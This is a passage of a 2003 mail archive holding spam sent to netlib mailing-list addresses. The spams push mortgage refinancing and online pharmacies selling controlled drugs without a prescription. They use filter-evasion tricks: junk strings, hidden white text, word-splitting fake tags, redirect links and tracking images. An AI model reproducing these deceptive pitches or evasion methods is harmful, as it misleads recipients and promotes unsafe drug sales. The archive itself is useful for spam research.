      <br>
      <font face=3D"Arial"><b>Go here <a =
href=3D"http://www.ultimatestocks.net">
      http://www.ultimatestocks.net</a> </b></font></td>
    </tr>
    </table>
  </center>
</div>

</body>

</html>


This Message Is Being Sent To blast-funct-archive@netlib2.cs.utk.edu.  =
<a =
href=3D"http://www.ultimatestocks.net/wfg/?Email=3Dblast-funct-archive@ne=
tlib2.cs.utk.edu">To Be Immediately Removed</a>
------=_NextPart_000_20DF67_01C37F4B.B8078080--

From btrinity@gte.net Thu Sep 25 03:47:24 2003
Return-Path: <btrinity@gte.net>
Received: from WIN2000 (stiejc@cable197a149.usuarios.retecal.es [212.183.197.149])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8P7lHRY026238
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 25 Sep 2003 03:47:20 -0400 (EDT)
Message-Id: <200309250747.h8P7lHRY026238@netlib2.cs.utk.edu>
From: "poster" <btrinity@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Re: survey finds refinanced mortgages work!
Date: Thu, 25 Sep 2003 9:47:42 +0200
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPlVudGl0bGVkIERvY3VtZW50PC90aXRsZT4N
CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFy
c2V0PWlzby04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjOTkwMDAwIiB0ZXh0
PSJ5ZWxsb3ciIGxpbms9IiNDQ0NDQ0MiIHZsaW5rPSIjQ0NDQ0NDIiBhbGluaz0iI0NDQ0NDQyIg
bGVmdG1hcmdpbj0iMCIgdG9wbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0
PSIwIj4NCjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxs
cGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjEiPg0KPHRyPg0KPHRkIGFsaWduPSJjZW50ZXIiPjxi
cj48YnI+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IndoaXRlIj48Yj5ET04nVCBMT1M8MzEyNDg2eTI+
RSBBTlkgTU9SRSBNT05FWSBPTiBZTzwzMTI0ODZ5Mj5VUiBFWElTVElORyBIT01FIExPQU4hPGJy
Pjxicj5obW0sIG9rYXkgc28geW91IHdhbnQgdG8gc2F2ZSBzb21lIG1vbjxicmEzPmV5LiB0YWtl
IGEgbG9vay4uPGJyPjxCUj5pdCdzIHZlcnkgc3BlY2lhbC5vbmx5IHRoPGxwNDJ5PmUgYmFua3Mg
a25vdyBhYm91dCBpdC4uPEJSPjxicj5JIGhvcGUgeW91ciByZWFkeSBmb3IgbG93ZXIgbW9ydGdh
Z2UgcmVwYXltZW50cyE8YnI+PC90ZD4NCjwvdHI+DQo8dHI+PHRkIGFsaWduPSJjZW50ZXIiPjxi
cj48YSBocmVmPSJodHRwOi8vd3d3LmE0dGE0dGF3ZS5jb20vMC8/c2FuZHkiPjxpbWcgc3JjPSJo
dHRwOi8vc2FuZHlAYTR0YTR0YXdlLmNvbS9zcGFjZXIuZ2lmIj48YnI+PDMxMjQ4NnkyPjxmb250
IGNvbG9yPSJ5ZWxsb3ciIHNpemU9IjMiPjxiPjx1PkNvbWUgYW5kIGJyb3dzZSBub3cuLjwvYT48
YnI+PGJyPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2JvZHk+DQo8L2h0bWw+DQo=


From brdjacobs@erols.com Thu Sep 25 03:55:14 2003
Return-Path: <brdjacobs@erols.com>
Received: from LJJ5 ([61.42.226.152])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8P7tCRY026391
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 25 Sep 2003 03:55:13 -0400 (EDT)
Message-Id: <200309250755.h8P7tCRY026391@netlib2.cs.utk.edu>
From: "comrades" <brdjacobs@erols.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: take control of your money NOW!
Date: Thu, 25 Sep 2003 16:55:47 +0900
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPlVudGl0bGVkIERvY3VtZW50PC90aXRsZT4N
CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFy
c2V0PWlzby04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjOTkwMDAwIiB0ZXh0
PSJ5ZWxsb3ciIGxpbms9IiNDQ0NDQ0MiIHZsaW5rPSIjQ0NDQ0NDIiBhbGluaz0iI0NDQ0NDQyIg
bGVmdG1hcmdpbj0iMCIgdG9wbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0
PSIwIj4NCjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxs
cGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjEiPg0KPHRyPg0KPHRkIGFsaWduPSJjZW50ZXIiPjxi
cj48YnI+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IndoaXRlIj48Yj5ET04nVCBMT1M8MjF5NzMyc3Y+
RSBBTlkgTU9SRSBNT05FWSBPTiBZTzwyMXk3MzJzdj5VUiBFWElTVElORyBIT01FIExPQU4hPGJy
Pjxicj5oZXkgaXRzIG1lIGFnPG9paXA+YWluLi4gZGlkIHlvdSBzZWUgdGhpcyBzaXRlPzxicj48
QlI+aXRzIGEgZ29kc2VuZCwgSSBoYXZlIHM8cXFxcG9kZD5hdmVkIGEgZm9ydHVuZTxCUj48YnI+
V2l0aCB0aGUgbW9uZXkgeW91IHNhdmUsIHB1dCBpdCB0b3dhcmRzIGEgbmV3IGM8bGlwPmFyITxi
cj48L3RkPg0KPC90cj4NCjx0cj48dGQgYWxpZ249ImNlbnRlciI+PGJyPjxhIGhyZWY9Imh0dHA6
Ly93d3cuYTR0YTR0YXdlLmNvbS8wLz9lZGdlcyI+PGltZyBzcmM9Imh0dHA6Ly9lZGdlc0BhNHRh
NHRhd2UuY29tL3NwYWNlci5naWYiPjxicj48MjF5NzMyc3Y+PGZvbnQgY29sb3I9InllbGxvdyIg
c2l6ZT0iMyI+PGI+PHU+RG9uJ3QgZGVsYXksIHRha2UgYSBxdWljayBsb29rLCBhbmQgYm9va21h
cmsgb3VyIHNpdGUuPC9hPjxicj48YnI+PC90ZD48L3RyPg0KPC90YWJsZT4NCjwvYm9keT4NCjwv
aHRtbD4NCg==


From rfextmvpn@friendlygeorges.us Thu Sep 25 20:40:42 2003
Return-Path: <rfextmvpn@friendlygeorges.us>
Received: from dsl-200-67-201-210.prodigy.net.mx (dsl-200-67-201-210.prodigy.net.mx [200.67.201.210])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8Q0eERY024850;
	Thu, 25 Sep 2003 20:40:27 -0400 (EDT)
Message-ID: <4me8o2sw228e6764122frh4qs-8g625@m181m.ui9.41>
From: "Ulysses Malone" <rfextmvpn@friendlygeorges.us>
Reply-To: "Ulysses Malone" <rfextmvpn@friendlygeorges.us>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: You Can Order Anti-Depressant, Weight Loss & Pain Relief Meds Online With NO PRESCRIPTION r bceutttga
Date: Fri, 26 Sep 2003 11:33:36 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EBEC6.DF858ED7.8ACD1BA"


--EBEC6.DF858ED7.8ACD1BA
Content-Type: text/html;
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUg
Y29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVu
dD0iTWljcm9zb2Z0IEZyb250UGFnZSA0LjAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwv
U1RZTEU+DQo8L0hFQUQ+DQo8Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPg0KPERJVj48
UCBhbGlnbj1jZW50ZXI+PGI+PGEgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS9uYXBsZXMv
Kmh0dHA6Ly9nZXRtb3Jlc2F2ZW1vcmUuYml6L2wvMTA1L2luZGV4Lmh0bT9wb3JwaHlyeSI+
PGZvbnQgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiIGNvbG9yPSIjRkZGRkZGIj54PC9mb250Pjxm
b250IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+VmFsaXVtPC9mb250
Pjxmb250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+dA0KICA8L2Zv
bnQ+PGZvbnQgY29sb3I9IiMwMDAwZmYiIHNpemU9IjQiIGZhY2U9IkFyaWFsIj4gLSA8L2Zv
bnQ+PGZvbnQgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiIGNvbG9yPSIjRkZGRkZGIj5vPC9mb250
Pjxmb250IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+VmlhZ3JhPC9m
b250Pjxmb250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+cDwvZm9u
dD48Zm9udCBjb2xvcj0iIzAwMDBmZiIgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiPiAtDQogIDwv
Zm9udD48Zm9udCBzaXplPSI0IiBmYWNlPSJBcmlhbCIgY29sb3I9IiNGRkZGRkYiPm48L2Zv
bnQ+PGZvbnQgY29sb3I9IiMwMDAwZmYiIHNpemU9IjQiIGZhY2U9IkFyaWFsIj5YYW5heDwv
Zm9udD48Zm9udCBzaXplPSI0IiBmYWNlPSJBcmlhbCIgY29sb3I9IiNGRkZGRkYiPmoNCiAg
PC9mb250Pjxmb250IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+IC0g
PC9mb250Pjxmb250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+azwv
Zm9udD48Zm9udCBjb2xvcj0iIzAwMDBmZiIgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiPkFtYmll
bjwvZm9udD48Zm9udCBzaXplPSI0IiBmYWNlPSJBcmlhbCIgY29sb3I9IiNGRkZGRkYiPmI8
L2ZvbnQ+PC9hPjwvYj48L1A+DQo8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1BcmlhbCBz
aXplPTI+LU1BTlkgTU9SRS08QlI+PEJSPjxCPk5vIFBoeXNpY2FsIEV4YW0gTmVlZGVkITwv
Qj48QlI+PEJSPlNpbXBsZSANCk9ubGluZSBGb3JtPC9GT05UPjwvUD4NCiAgPEZPTlQgZmFj
ZT1BcmlhbCBzaXplPTI+DQo8UCBhbGlnbj1jZW50ZXI+Jm5ic3A7PC9QPg0KPFAgYWxpZ249
Y2VudGVyPiZuYnNwOzwvUD4NCjxQIGFsaWduPWNlbnRlcj4mbmJzcDs8L1A+DQo8L0ZPTlQ+
PFAgYWxpZ249Y2VudGVyPjxGT05UIHNpemU9MSBmYWNlPSJBcmlhbCI+PFU+PGEgaHJlZj0i
aHR0cDovL3JkLnlhaG9vLmNvbS9taWVuLypodHRwOi8vZ2V0bW9yZXNhdmVtb3JlLmJpei9v
cHRvdXQuaHRtbD9pbnRlbnNpZnkiPjxGT05UIA0KY29sb3I9IzAwMDBmZj5kaXNwZWxsaW5n
Tk9NT1JFTUFJTDwvRk9OVD48L2E+PC9VPjwvRk9OVD48L1A+DQogIDwvRElWPg0KPC9ESVY+
PC9CT0RZPjwvSFRNTD52YmEgIG13dGthDQp5ZnENCmVubCAgeCB4eGJycWRxIGNwZnZhcWxy
aWhnbSAgbiBia3oNCiBnDQpqeiBobWhqYWJ5Ymh5IGZldHc=



--EBEC6.DF858ED7.8ACD1BA--


From iyeawcrfy@att.net Sat Sep 27 12:24:09 2003
Return-Path: <iyeawcrfy@att.net>
Received: from 160.36.58.108 ([210.22.176.165])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8RGO1RY010482;
	Sat, 27 Sep 2003 12:24:05 -0400 (EDT)
Received: from (HELO 01ba) [40.230.96.92] by 160.36.58.108 with SMTP; Sun, 28 Sep 2003 03:24:51 -0200
Message-ID: <9f73--6k7i-oa-39@d572y.45pr6k>
From: "Carey Miner" <iyeawcrfy@att.net>
Reply-To: "Carey Miner" <iyeawcrfy@att.net>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Subject: Your Prescription Refill is Ready  j yrzcuailqhvi
Date: Sun, 28 Sep 03 03:24:51 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DA8033F_7DCB.0"
X-Priority: 1
X-MSMail-Priority: High


--DA8033F_7DCB.0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

avery <HR><HTML><p align=3D"center"><B><FONT  COLOR=3D"#ff0000" PTS=
IZE=3D18 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0" style=3D"font-size=
: 20pt">Wholesale Prescription Medications!</FONT><FONT  COLOR=3D"#000000"=
 BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12=
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><BR></FONT><I><FONT  COLOR=
=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3=
 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Franklin Gothic Medium" LANG=3D"=
0">OUR DOCTORS WILL WRITE YOU A PRESCRIPTION FOR FREE!</FONT></I><FONT  CO=
LOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff"
SIZE=3D=
3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><BR></FONT><F=
ONT  COLOR=3D"#000099" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff=
" SIZE=3D5 PTSIZE=3D18 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">GET =
YOUR PRESCRIPTION MEDS ONLINE</FONT></B><FONT  COLOR=3D"#000000" style=3D"=
BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF"
FACE=3D=
"Arial" LANG=3D"0"><BR></FONT><B><FONT  COLOR=3D"#FF0000" BACK=3D"#c0c0c0"=
 SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">Phente=
rmine, Adipex, Soma, Fioricet, Ultram, Celebrex, Viagra, Valtrex, Zyban, o=
thers.</FONT><FONT  COLOR=3D"#ff0000" BACK=3D"#c0c0c0" SIZE=3D1 PTSIZE=3D8=
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><br> Weight Loss, Pain Rel=
ief, Muscle Pain Relief, Women's, Men's Health, Impotence, <BR>Allergy Rel=
ief, Heartburn Relief, Migraine Relief &amp; MORE!</FONT></FONT></B><FONT =
 COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SI=
ZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><BR><B><=
BR>No Prior Prescription Required - Lowest Prices Possible<BR>US Licensed =
Doctors will Prescribe Your Medication For Free</B><BR><B>Shipped Overnigh=
t To Your Door. </B> </FONT><FONT  COLOR=3D"#000000" BACK=3D"#ffffff" styl=
e=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" F=
ACE=3D"Arial" LANG=3D"0">(upon approval)</FONT></p><p align=3D"center"><a =
href=3D"http://www.rxdiscountusa.biz/online" style=3D"text-decoration: non=
e"><span style=3D"background-color: #FFFFFF"><b><font face=3D"Arial"
size=3D=
"5">CLICK HERE TO FIND OUT HOW</font></b></span></a><FONT  COLOR=3D"#0000f=
f" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D5 PTSIZE=3D=
18 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><B><A HREF=3D"http://www=
rxdiscountusa.biz/online" style=3D"text-decoration: none">!</A></B></FONT=
><FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #fff=
fff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><=
/B><BR></FONT><FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUN=
D-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"Arial" =
LANG=3D"0"><A HREF=3D"http://WWW.rxdiscountusa.biz/a.html" style=3D"text-d=
ecoration: none">No thanks, please take me off your list</A></FONT><FONT  =
COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
E=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><BR></FON=
T></HTML><HR>sky az v fgcxbzummgcokfvezowwuo 
dzvrltcqzyt vgz  vj be
ifrhcn fwdgapse xqsyo  yg
qmk
k uh

--DA8033F_7DCB.0--


From r125savuzy@yahoo.com Sat Sep 27 13:54:54 2003
Return-Path: <r125savuzy@yahoo.com>
Received: from 160.36.58.108 ([200.97.70.41])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8RHseRY011464;
	Sat, 27 Sep 2003 13:54:45 -0400 (EDT)
Message-ID: <l51lpn$16kf$29b66ux-0sq098mny91@uwx.9l9qbk>
From: "Johnathan Glover" <r125savuzy@yahoo.com>
Reply-To: "Johnathan Glover" <r125savuzy@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Online Pharmacy..SOMA....ULTRAM...ADIPEX,etc s swwvwlajciyb
Date: Sun, 28 Sep 2003 09:43:49 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B88AF334D_D__E.AF7__CB"


--B88AF334D_D__E.AF7__CB
Content-Type: text/html;
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUg
Y29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVu
dD0iTWljcm9zb2Z0IEZyb250UGFnZSA0LjAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwv
U1RZTEU+DQo8L0hFQUQ+DQo8Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPg0KPERJViBh
bGlnbj1jZW50ZXI+DQo8Q0VOVEVSPg0KPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRp
bmc9MCB3aWR0aD00NzUgYm9yZGVyPTA+DQogIDxUQk9EWT4NCiAgPFRSPg0KICAgIDxURCB3
aWR0aD0iMTAwJSI+DQogICAgICA8RElWIGFsaWduPWNlbnRlcj4NCiAgICAgIDxDRU5URVI+
DQogICAgICA8VEFCTEUgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIHdpZHRoPSIxMDAl
IiBib3JkZXI9MD4NCiAgICAgICAgPFRCT0RZPg0KICAgICAgICA8VFI+DQogICAgICAgICAg
PFREIHdpZHRoPSIzMyUiPjwvVEQ+DQogICAgICAgICAgPFREIHdpZHRoPSIzMyUiPjxJTUcg
DQogICAgICAgICAgICBzdHlsZT0iQk9SREVSLVJJR0hUOiAjMDAwMDgwIDFweCByaWRnZTsg
Qk9SREVSLVRPUDogIzAwMDA4MCAxcHggcmlkZ2U7IEJPUkRFUi1MRUZUOiANCg0KIzAwMDA4
MCAxcHggcmlkZ2U7IEJPUkRFUi1CT1RUT006ICMwMDAwODAgMXB4IHJpZGdlIiANCiAgICAg
ICAgICAgIHNyYz0iaHR0cDovL3JkLnlhaG9vLmNvbS9zcGF5ZWQvKmh0dHA6Ly93d3cucmVh
bG11bXV2LmJpei9ybXRpbWFnZXMvdG9wX2ltZy9pbWdfMDIuZ2lmP2FmdGVybGlmZT9wcmVz
dXBwb3NlIj48L1REPg0KICAgICAgICAgIDxURCB3aWR0aD0iMzQlIj48L1REPjwvVFI+PC9U
Qk9EWT48L1RBQkxFPjwvQ0VOVEVSPjwvRElWPg0KICAgICAgPFRBQkxFPg0KICAgICAgICA8
VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgYWxpZ249bWlkZGxlIHdpZHRo
PSIzMyUiPjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS9zZXRv
bi8qaHR0cDovL3JlYWxtdW11di5iaXovdnByNjY1MyI+PElNRyANCiAgICAgICAgICAgIHNy
Yz0iaHR0cDovL3JkLnlhaG9vLmNvbS92ZXRvLypodHRwOi8vd3d3LnJlYWxtdW11di5iaXov
cm10aW1hZ2VzL2N5Y2xvYmVuemFwcmluZS5naWY/aW5leHRyaWNhYmxlIiBib3JkZXI9MD48
L0E+PC9URD4NCiAgICAgICAgICA8VEQgYWxpZ249bWlkZGxlIHdpZHRoPSIzMyUiPjxBIA0K
ICAgICAgICAgICAgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS9nbm9tb25pYy8qaHR0cDov
L3JlYWxtdW11di5iaXovdnByNjY1MyI+PElNRyANCiAgICAgICAgICAgIHNyYz0iaHR0cDov
L3JkLnlhaG9vLmNvbS9jb250cm9sbGluZy8qaHR0cDovL3d3dy5yZWFsbXVtdXYuYml6L3Jt
dGltYWdlcy9maW9yaWNldC5naWY/YmFncGlwZSIgDQogICAgICAgICAgICBib3JkZXI9MD48
L0E+PC9URD4NCiAgICAgICAgICA8VEQgYWxpZ249bWlkZGxlIHdpZHRoPSIzMyUiPjxBIA0K
ICAgICAgICAgICAgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS9taW5zay8qaHR0cDovL3Jl
YWxtdW11di5iaXovdnByNjY1MyI+PElNRyANCiAgICAgICAgICAgIHNyYz0iaHR0cDovL3Jk
LnlhaG9vLmNvbS9jYXJ0ZS8qaHR0cDovL3d3dy5yZWFsbXVtdXYuYml6L3JtdGltYWdlcy9z
b21hLmdpZj93ZWIiIA0KICAgICAgICAgICAgYm9yZGVyPTA+PC9BPjwvVEQ+PC9UUj48L1RC
T0RZPjwvVEFCTEU+DQogICAgICA8VEFCTEUgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0w
IHdpZHRoPSIxMDAlIiBib3JkZXI9MD4NCiAgICAgICAgPFRCT0RZPg0KICAgICAgICA8VFI+
DQogICAgICAgICAgPFREIHdpZHRoPSIxMDAlIj48Rk9OVCBzaXplPTE+Jm5ic3A7PC9GT05U
PjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+DQogICAgICA8VEFCTEUgd2lkdGg9IjEwMCUi
Pg0KICAgICAgICA8VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgd2lkdGg9
IjMzJSI+PEEgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS92aXNpYmxlLypodHRwOi8vcmVh
bG11bXV2LmJpei92cHI2NjUzIj48SU1HIA0KICAgICAgICAgICAgc3JjPSJodHRwOi8vcmQu
eWFob28uY29tL2NvcnJpZ2libGUvKmh0dHA6Ly93d3cucmVhbG11bXV2LmJpei9ybXRpbWFn
ZXMvcGhlbnRlcm1pbmUuZ2lmP2RlZXBlbiIgYm9yZGVyPTA+PC9BPjwvVEQ+DQogICAgICAg
ICAgPFREIHdpZHRoPSIzMyUiPjxBIGhyZWY9Imh0dHA6Ly9yZC55YWhvby5jb20vY2FybHRv
bi8qaHR0cDovL3JlYWxtdW11di5iaXovdnByNjY1MyI+PElNRyBzcmM9Imh0dHA6Ly9yZC55
YWhvby5jb20vZ2FvLypodHRwOi8vd3d3LnJlYWxtdW11di5iaXovcm10aW1hZ2VzL3ZpYWdy
YS5naWY/c2hpZWxkIiBib3JkZXI9MD48L0E+PC9URD4NCiAgICAgICAgICA8VEQgd2lkdGg9
IjMzJSI+PEEgaHJlZj0iaHR0cDovL3JkLnlhaG9vLmNvbS9yZWVkeS8qaHR0cDovL3JlYWxt
dW11di5iaXovdnByNjY1MyI+PElNRyBzcmM9Imh0dHA6Ly9yZC55YWhvby5jb20vZGVzY2Vu
ZC8qaHR0cDovL3d3dy5yZWFsbXVtdXYuYml6L3JtdGltYWdlcy9hbWJpZW4uZ2lmP2JhZmZs
ZSIgYm9yZGVyPTA+PC9BPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+DQogICAgICA8VEFC
TEUgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIHdpZHRoPSIxMDAlIiBib3JkZXI9MD4N
CiAgICAgICAgPFRCT0RZPg0KICAgICAgICA8VFI+DQogICAgICAgICAgPFREIHdpZHRoPSIx
MDAlIj48Rk9OVCBzaXplPTE+Jm5ic3A7PC9GT05UPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFC
TEU+DQogICAgICA8VEFCTEUgd2lkdGg9IjEwMCUiPg0KICAgICAgICA8VEJPRFk+DQogICAg
ICAgIDxUUj4NCiAgICAgICAgICA8VEQgd2lkdGg9IjMzJSI+PEEgaHJlZj0iaHR0cDovL3Jk
LnlhaG9vLmNvbS9oaXRsZXIvKmh0dHA6Ly9yZWFsbXVtdXYuYml6L3ZwcjY2NTMiPjxJTUcg
c3JjPSJodHRwOi8vcmQueWFob28uY29tL2JpZGlhZ29uYWwvKmh0dHA6Ly93d3cucmVhbG11
bXV2LmJpei9ybXRpbWFnZXMvc2tlbGF4aW4uZ2lmP2NoYW50ZXkiIGJvcmRlcj0wPjwvQT48
L1REPg0KICAgICAgICAgIDxURCB3aWR0aD0iMzMlIj48QSBocmVmPSJodHRwOi8vcmQueWFo
b28uY29tL2FpZC8qaHR0cDovL3JlYWxtdW11di5iaXovdnByNjY1MyI+PElNRyBzcmM9Imh0
dHA6Ly9yZC55YWhvby5jb20vYWZ0ZXJlZmZlY3QvKmh0dHA6Ly93d3cucmVhbG11bXV2LmJp
ei9ybXRpbWFnZXMvdWx0cmFtLmdpZj9pbnRlcmZlcmUiIGJvcmRlcj0wPjwvQT48L1REPg0K
ICAgICAgICAgIDxURCB3aWR0aD0iMzMlIj48QSBocmVmPSJodHRwOi8vcmQueWFob28uY29t
L2NvYnJhLypodHRwOi8vcmVhbG11bXV2LmJpei92cHI2NjUzIj48SU1HIHNyYz0iaHR0cDov
L3JkLnlhaG9vLmNvbS9tYXR0ZS8qaHR0cDovL3d3dy5yZWFsbXVtdXYuYml6L3JtdGltYWdl
cy96YW5hZmxleC5naWY/aW1wb3NlIiANCmJvcmRlcj0wPjwvQT48L1REPjwvVFI+PC9UQk9E
WT48L1RBQkxFPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9DRU5URVI+PC9ESVY+DQo8
UCBhbGlnbj0iY2VudGVyIj48Rk9OVCBsYW5nPTAgDQpzdHlsZT0iQkFDS0dST1VORC1DT0xP
UjogI2ZmZmZmZiIgZmFjZT1BcmlhbCBjb2xvcj0jMDAwMGZmIHNpemU9MSBCQUNLPSIjZmZm
ZmZmIiANCkZBTUlMWT0iU0FOU1NFUklGIj48QSBocmVmPSJodHRwOi8vcmQueWFob28uY29t
L3RhcnBhdWxpbi8qaHR0cDovL3d3dy5ob3RyeC5uZXQvcmVtb3ZlIj5jb25mZWRlcmFjeU5v
VGhhbmtzPC9BPjwvRk9OVD48L1A+PC9ESVY+PC9CT0RZPjwvSFRNTD5zZ2hzc3R6IGUgdXRv
ZWp0eGhsaHJ1Y3U=



--B88AF334D_D__E.AF7__CB--


